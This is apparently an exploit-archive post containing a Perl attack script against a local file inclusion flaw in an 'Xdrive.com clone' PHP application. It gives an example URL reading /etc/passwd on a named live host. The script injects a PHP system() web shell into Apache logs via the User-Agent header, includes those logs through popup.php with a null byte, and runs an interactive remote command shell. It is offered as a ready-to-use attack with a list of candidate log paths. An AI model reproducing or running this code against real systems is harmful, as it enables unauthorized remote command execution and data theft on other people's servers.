exemplu: http://www.pck1.go.th/mongdamclub/xdrive/popup.php?read=../../../../../../../../../../etc/passwd #!/usr/bin/perl # # Xdrive.com Clone Local File Inclusion Exploit # LinK : [url]http://rapidshare.com/files/33251938/clonesite.rar[/url] # # (c)od3d and f0unded by Kw3[R]Ln from Romanian Security Team a.K.A [url]http://RSTZONE.NET[/url] # Contact: teh_lost_byte[AT]YaHOo[dot]com # # # File inclusion: http://www.site.com/xdrive/popup.php?read=<local/remote file> # # Example: #[url]http://www.pck1.go.th/mongdamclub/xdrive/popup.php?read=../../../../../../../../../../etc/passwd[/url] # # Greetz to all RST memberz and milw0rm use IO::Socket; use LWP::Simple; @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); print "[RST] Xdrive.com Clone Local File Inclusion Exploit\n"; print "[RST] need magic_quotes_gpc = off\n"; print "[RST] c0ded by Kw3rLN from Romanian Security Team [ [url]http://rst-crew.net[/url] ] \n\n"; if (@ARGV < 3) { print "[RST] Usage: xdrive.pl [host] [path] [apache_path]\n\n"; print "[RST] Apache Path: \n"; $i = 0; while($apache[$i]) { print "[$i] $apache[$i]\n";$i++;} exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "[RST] Injecting some code in log files...\n"; $CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; print $socket "User-Agent: ".$CODE."\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "[RST] Shell!! write q to exit !\n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = <STDIN>; while($cmd !~ "q") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."/popup.php?read=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = <STDIN>; }